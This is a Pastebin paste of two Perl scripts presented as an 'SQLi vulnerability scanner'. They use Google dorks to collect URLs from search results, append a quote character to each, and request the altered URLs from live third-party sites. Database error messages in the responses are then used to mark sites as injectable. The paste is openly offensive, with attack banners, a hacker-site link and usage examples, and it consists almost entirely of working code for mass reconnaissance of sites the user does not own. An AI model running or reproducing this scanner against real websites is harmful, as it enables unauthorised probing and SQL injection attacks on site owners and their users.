iViiRuS

Sqli vulnerability scanner

Jun 4th, 2014
1,573
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2.  
  3. #!/usr/bin/perl
  4. # .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
  5. # .:. Script : SQLi Vulnerable Scanner perl   .:..
  6. # .:. Author : Sheikh Viirus                   .:.
  7. # .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
  8. # .:. MySQL Injection                         .:.
  9. # .:. MSAccess Injection                      .:.
  10. # .:. MSSQL Injection                         .:.
  11. # .:. Oracle Injection                        .:.
  12. # .:. Blind Injection                         .:.
  13. # .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
  14. #  Useless version :
  15. #  recode: Sheikh Viirus
  16. use LWP::UserAgent;
  17. use Getopt::Std;
  18.  
  19. getopt('kpo', \%opts);
  20. if($opts{'k'} eq '')
  21. {
  22. print "[Help] SQLi.pl -k shopping.php?id= -p 500\n"; # Max: 50,100,500,700,etc...
  23. }
  24. if($opts{'p'} eq '')
  25. {
  26.     $opts{'p'} = 1;
  27. }
  28.  
  29. print <<"Sheikh Viirus_intro";
  30.  
  31.  
  32.     ___________
  33.    |.---------.|
  34.    ||        ||
  35.    || 5c4nn3r ||   SQL injection attack!
  36.    ||         ||    go go go go !!!
  37.    |'---------'|
  38.     `)__ ____('    
  39.    [=== -- o ]
  40.  __'---------'__
  41. [::::::::::: :::]
  42. [:::::::::::::::]
  43. intro_scan
  44. system('COLOR A');
  45. print "\n\n";
  46. print "Injecting ...\n";
  47. print "--------------------------\n\n";
  48.  
  49.  
  50. for($start = 0;$start != $opts{'p'}*10;$start += 10)
  51. {
  52.    $t = "http://www.google.co.id/search?hl=fr&q=".$opts{'k'}."&btnG=Search&start=".$start;
  53.    $ua = LWP::UserAgent->new;
  54.    $ua->timeout(10);
  55.    $ua->env_proxy;
  56.    $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E");
  57.    $response = $ua->get($t);
  58.    if ($response->is_success)
  59.    {
  60.        $c = $response->content;
  61.        @stuff = split(/<a href=/,$c);
  62.        foreach $line(@stuff)
  63.        {
  64.            if($line =~/(.*) class=l/ig)
  65.            {
  66.                $out = $1;
  67.                $out =~ s/"//g;
  68.      $out =~s/$/\'/;
  69.          
  70.    $ua = LWP::UserAgent->new;
  71.    $ua->timeout(10);
  72.    $ua->env_proxy;
  73.    $response = $ua->get($out);
  74.            $error = $response->content();
  75.            if($error =~m/SQL syntax/)
  76.                {print "$out Vulnerable MySQL!\n";}
  77.              
  78.            elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)
  79.                {print "$out Vulnerable MS Access!\n";}
  80.              
  81.            elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)
  82.                {print "$out Vulnerable MSSQL!\n";}
  83.          
  84.            elsif($error =~m/mysql_fetch_array()/ || $error =~m/mysql_num_rows()/)
  85.                {print "$out Vulnerable Blind Possible!\n";}
  86.              
  87.            elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
  88.                {print "$out Vulnerable Oracle!\n";}
  89.              
  90.            }
  91.        }
  92.        }
  93.        }
  94.  
  95.  
  96.  
  97. script 2
  98.  
  99. #!/usr/bin/perl
  100. # .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
  101. # .:. Script : SQLi Vulnerable Scanner        .:.
  102. # .:. Author : Sheikh Viirus                  .:.
  103. # .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
  104. # .:. MySQL Injection
  105. # .:. MSAccess Injection
  106. # .:. MSSQL Injection
  107. # .:. Oracle Injection
  108. # .:. Blind Injection
  109. #
  110. #
  111. use LWP::UserAgent;
  112. use Getopt::Std;
  113.  
  114. getopt('kpo', \%opts);
  115. if($opts{'k'} eq '')
  116. {
  117. print "example:perl sql.pl -k intext:"mysql_fetch_array()"= -p 100\n";
  118. }
  119. if($opts{'p'} eq '')
  120. {
  121. $opts{'p'} = 1;
  122. }
  123.  
  124. print "o0o0o0o00o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o\n";
  125. print "0 x90 o\n";
  126. print "o Gay Sql Scanner o\n";
  127. print "0 http://h4cky0u.org o\n";
  128. print "o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0\n";
  129.  
  130. for($start = 0;$start != $opts{'p'}*10;$start += 10)
  131. {
  132. $t = "http://www.google.com/search?hl=en&q=".$opts{'k'}."&btnG=Search&start=".$start;
  133. $ua = LWP::UserAgent->new;
  134. $ua->timeout(10);
  135. $ua->env_proxy;
  136. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
  137. $response = $ua->get($t);
  138. if ($response->is_success)
  139. {
  140. $c = $response->content;
  141. @stuff = split(/<a href=/,$c);
  142. foreach $line(@stuff)
  143. {
  144. if($line =~/(.*) class=l/ig)
  145. {
  146. $out = $1;
  147. $out =~ s/"//g;
  148. $out =~s/$/\'/;
  149.  
  150. $ua = LWP::UserAgent->new;
  151. $ua->timeout(10);
  152. $ua->env_proxy;
  153. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
  154. $response = $ua->get($out);
  155. $error = $response->content();
  156. if($error =~m/SQL syntax/)
  157. {
  158. print "$out:could be vulnerable!\n";
  159. }
  160.  
  161. }
  162. }
  163. }
  164. }
  165.  
  166.  
  167. NB : software command : perl namefile.pl -k <dork> -p <page>
  168.     example : perl sql.pl -k intext:"mysql_fetch_array()"= -p 100
RAW Paste Data